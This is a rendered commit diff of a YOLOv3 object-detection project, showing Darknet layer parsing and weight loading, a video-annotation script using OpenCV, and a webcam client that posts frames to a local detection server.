out_filters.append(prev_filters)
|
398 |
+
elif block['type'] == 'upsample':
|
399 |
+
stride = int(block['stride'])
|
400 |
+
filters = prev_filters
|
401 |
+
width = prev_width*stride
|
402 |
+
height = prev_height*stride
|
403 |
+
print('%5d %-6s * %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'upsample', stride, prev_width, prev_height, prev_filters, width, height, filters))
|
404 |
+
prev_width = width
|
405 |
+
prev_height = height
|
406 |
+
prev_filters = filters
|
407 |
+
out_widths.append(prev_width)
|
408 |
+
out_heights.append(prev_height)
|
409 |
+
out_filters.append(prev_filters)
|
410 |
+
elif block['type'] == 'route':
|
411 |
+
layers = block['layers'].split(',')
|
412 |
+
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
|
413 |
+
if len(layers) == 1:
|
414 |
+
print('%5d %-6s %d' % (ind, 'route', layers[0]))
|
415 |
+
prev_width = out_widths[layers[0]]
|
416 |
+
prev_height = out_heights[layers[0]]
|
417 |
+
prev_filters = out_filters[layers[0]]
|
418 |
+
elif len(layers) == 2:
|
419 |
+
print('%5d %-6s %d %d' % (ind, 'route', layers[0], layers[1]))
|
420 |
+
prev_width = out_widths[layers[0]]
|
421 |
+
prev_height = out_heights[layers[0]]
|
422 |
+
assert(prev_width == out_widths[layers[1]])
|
423 |
+
assert(prev_height == out_heights[layers[1]])
|
424 |
+
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
|
425 |
+
out_widths.append(prev_width)
|
426 |
+
out_heights.append(prev_height)
|
427 |
+
out_filters.append(prev_filters)
|
428 |
+
elif block['type'] in ['region', 'yolo']:
|
429 |
+
print('%5d %-6s' % (ind, 'detection'))
|
430 |
+
out_widths.append(prev_width)
|
431 |
+
out_heights.append(prev_height)
|
432 |
+
out_filters.append(prev_filters)
|
433 |
+
elif block['type'] == 'shortcut':
|
434 |
+
from_id = int(block['from'])
|
435 |
+
from_id = from_id if from_id > 0 else from_id+ind
|
436 |
+
print('%5d %-6s %d' % (ind, 'shortcut', from_id))
|
437 |
+
prev_width = out_widths[from_id]
|
438 |
+
prev_height = out_heights[from_id]
|
439 |
+
prev_filters = out_filters[from_id]
|
440 |
+
out_widths.append(prev_width)
|
441 |
+
out_heights.append(prev_height)
|
442 |
+
out_filters.append(prev_filters)
|
443 |
+
else:
|
444 |
+
print('unknown type %s' % (block['type']))
|
445 |
+
|
446 |
+
|
447 |
+
def load_conv(buf, start, conv_model):
|
448 |
+
num_w = conv_model.weight.numel()
|
449 |
+
num_b = conv_model.bias.numel()
|
450 |
+
conv_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
|
451 |
+
conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data)); start = start + num_w
|
452 |
+
return start
|
453 |
+
|
454 |
+
|
455 |
+
def load_conv_bn(buf, start, conv_model, bn_model):
|
456 |
+
num_w = conv_model.weight.numel()
|
457 |
+
num_b = bn_model.bias.numel()
|
458 |
+
bn_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
|
459 |
+
bn_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
|
460 |
+
bn_model.running_mean.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
|
461 |
+
bn_model.running_var.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
|
462 |
+
conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data)); start = start + num_w
|
463 |
+
return start
|
CaesarObjectDetection/data/coco.names
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:634a1132eb33f8091d60f2c346ababe8b905ae08387037aed883953b7329af84
|
3 |
+
size 625
|
CaesarObjectDetection/images/cat.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/city_scene.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/dog.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/dog2.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/eagle.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/food.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/giraffe.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/horses.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/man-in-black-and-white-jacket-riding-brown-horse-3596689.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/motorbike.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/nathan-rogers-jMmv6HhHb0k-unsplash.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/person.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/street.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/images/surf.jpg
ADDED
![]() |
Git LFS Details
|
CaesarObjectDetection/read_video.py
ADDED
@@ -0,0 +1,112 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import cv2
|
2 |
+
import numpy as np
|
3 |
+
|
4 |
+
import time
|
5 |
+
import sys
|
6 |
+
|
7 |
+
CONFIDENCE = 0.5
|
8 |
+
SCORE_THRESHOLD = 0.5
|
9 |
+
IOU_THRESHOLD = 0.5
|
10 |
+
config_path = "cfg/yolov3.cfg"
|
11 |
+
weights_path = "weights/yolov3.weights"
|
12 |
+
font_scale = 1
|
13 |
+
thickness = 1
|
14 |
+
labels = open("data/coco.names").read().strip().split("\n")
|
15 |
+
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
|
16 |
+
|
17 |
+
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
|
18 |
+
|
19 |
+
ln = net.getLayerNames()
|
20 |
+
try:
|
21 |
+
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
|
22 |
+
except IndexError:
|
23 |
+
# in case getUnconnectedOutLayers() returns 1D array when CUDA isn't available
|
24 |
+
ln = [ln[i - 1] for i in net.getUnconnectedOutLayers()]
|
25 |
+
# read the file from the command line
|
26 |
+
video_file = sys.argv[1]
|
27 |
+
cap = cv2.VideoCapture(video_file)
|
28 |
+
_, image = cap.read()
|
29 |
+
h, w = image.shape[:2]
|
30 |
+
fourcc = cv2.VideoWriter_fourcc(*"XVID")
|
31 |
+
out = cv2.VideoWriter("output.avi", fourcc, 20.0, (w, h))
|
32 |
+
while True:
|
33 |
+
_, image = cap.read()
|
34 |
+
|
35 |
+
h, w = image.shape[:2]
|
36 |
+
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
|
37 |
+
net.setInput(blob)
|
38 |
+
start = time.perf_counter()
|
39 |
+
layer_outputs = net.forward(ln)
|
40 |
+
time_took = time.perf_counter() - start
|
41 |
+
print("Time took:", time_took)
|
42 |
+
boxes, confidences, class_ids = [], [], []
|
43 |
+
|
44 |
+
# loop over each of the layer outputs
|
45 |
+
for output in layer_outputs:
|
46 |
+
# loop over each of the object detections
|
47 |
+
for detection in output:
|
48 |
+
# extract the class id (label) and confidence (as a probability) of
|
49 |
+
# the current object detection
|
50 |
+
scores = detection[5:]
|
51 |
+
class_id = np.argmax(scores)
|
52 |
+
confidence = scores[class_id]
|
53 |
+
# discard weak predictions by ensuring the detected
|
54 |
+
# probability is greater than the minimum probability
|
55 |
+
if confidence > CONFIDENCE:
|
56 |
+
# scale the bounding box coordinates back relative to the
|
57 |
+
# size of the image, keeping in mind that YOLO actually
|
58 |
+
# returns the center (x, y)-coordinates of the bounding
|
59 |
+
# box followed by the boxes' width and height
|
60 |
+
box = detection[:4] * np.array([w, h, w, h])
|
61 |
+
(centerX, centerY, width, height) = box.astype("int")
|
62 |
+
|
63 |
+
# use the center (x, y)-coordinates to derive the top and
|
64 |
+
# and left corner of the bounding box
|
65 |
+
x = int(centerX - (width / 2))
|
66 |
+
y = int(centerY - (height / 2))
|
67 |
+
|
68 |
+
# update our list of bounding box coordinates, confidences,
|
69 |
+
# and class IDs
|
70 |
+
boxes.append([x, y, int(width), int(height)])
|
71 |
+
confidences.append(float(confidence))
|
72 |
+
class_ids.append(class_id)
|
73 |
+
|
74 |
+
# perform the non maximum suppression given the scores defined before
|
75 |
+
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
|
76 |
+
|
77 |
+
font_scale = 1
|
78 |
+
thickness = 1
|
79 |
+
|
80 |
+
# ensure at least one detection exists
|
81 |
+
if len(idxs) > 0:
|
82 |
+
# loop over the indexes we are keeping
|
83 |
+
for i in idxs.flatten():
|
84 |
+
# extract the bounding box coordinates
|
85 |
+
x, y = boxes[i][0], boxes[i][1]
|
86 |
+
w, h = boxes[i][2], boxes[i][3]
|
87 |
+
# draw a bounding box rectangle and label on the image
|
88 |
+
color = [int(c) for c in colors[class_ids[i]]]
|
89 |
+
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
|
90 |
+
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
|
91 |
+
# calculate text width & height to draw the transparent boxes as background of the text
|
92 |
+
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
|
93 |
+
text_offset_x = x
|
94 |
+
text_offset_y = y - 5
|
95 |
+
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
|
96 |
+
overlay = image.copy()
|
97 |
+
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
|
98 |
+
# add opacity (transparency to the box)
|
99 |
+
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
|
100 |
+
# now put the text (label: confidence %)
|
101 |
+
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
|
102 |
+
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
|
103 |
+
|
104 |
+
out.write(image)
|
105 |
+
cv2.imshow("image", image)
|
106 |
+
|
107 |
+
if ord("q") == cv2.waitKey(1):
|
108 |
+
break
|
109 |
+
|
110 |
+
|
111 |
+
cap.release()
|
112 |
+
cv2.destroyAllWindows()
|
CaesarObjectDetection/requirements.txt
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
opencv-python
|
2 |
+
numpy
|
3 |
+
matplotlib
|
CaesarObjectDetection/sendweb.py
ADDED
@@ -0,0 +1,51 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
import socketio
|
3 |
+
import cv2
|
4 |
+
import numpy as np
|
5 |
+
import requests
|
6 |
+
import base64
|
7 |
+
import time
|
8 |
+
#sio = socketio.Client()
|
9 |
+
|
10 |
+
#sio.connect('http://localhost:5000')
|
11 |
+
|
12 |
+
#sio.emit('man', {'from': 'client'})
|
13 |
+
|
14 |
+
#@sio.on("capture")
|
15 |
+
#def capture():
|
16 |
+
|
17 |
+
|
18 |
+
#cv2.imshow("image", image)
|
19 |
+
#if ord("q") == cv2.waitKey(1):
|
20 |
+
# break
|
21 |
+
|
22 |
+
#cap.release()
|
23 |
+
#cv2.destroyAllWindows()
|
24 |
+
|
25 |
+
|
26 |
+
#@sio.on('response')
|
27 |
+
#def response(data):
|
28 |
+
# print(data) # {'from': 'server'}
|
29 |
+
|
30 |
+
# sio.disconnect()
|
31 |
+
# exit(0)
|
32 |
+
|
33 |
+
cap = cv2.VideoCapture(0)
|
34 |
+
while True:
|
35 |
+
_, image = cap.read()
|
36 |
+
response = requests.post("http://127.0.0.1:5000/caesarobjectdetect",json={"frame":base64.b64encode(image).decode()})
|
37 |
+
imagebase64 = np.array(response.json()["frame"])
|
38 |
+
|
39 |
+
image = np.frombuffer(base64.b64decode(imagebase64),dtype="uint8").reshape(480,640,3)
|
40 |
+
cv2.imshow("image", image)
|
41 |
+
if ord("q") == cv2.waitKey(1):
|
42 |
+
break
|
43 |
+
|
44 |
+
cap.release()
|
45 |
+
cv2.destroyAllWindows()
|
46 |
+
# @sio.on('caesarobjectresponse')
|
47 |
+
#def caesarobjectresponse(image):
|
48 |
+
# #print(image)
|
49 |
+
# cv2.imshow("image", {'frame':np.array(image["frame"])})
|
50 |
+
#sio.emit("caesarobjectdetect",{'frame':str(image)})
|
51 |
+
|
CaesarObjectDetection/stop
ADDED
@@ -0,0 +1 @@
|
|
|
|
|
1 |
+
q
|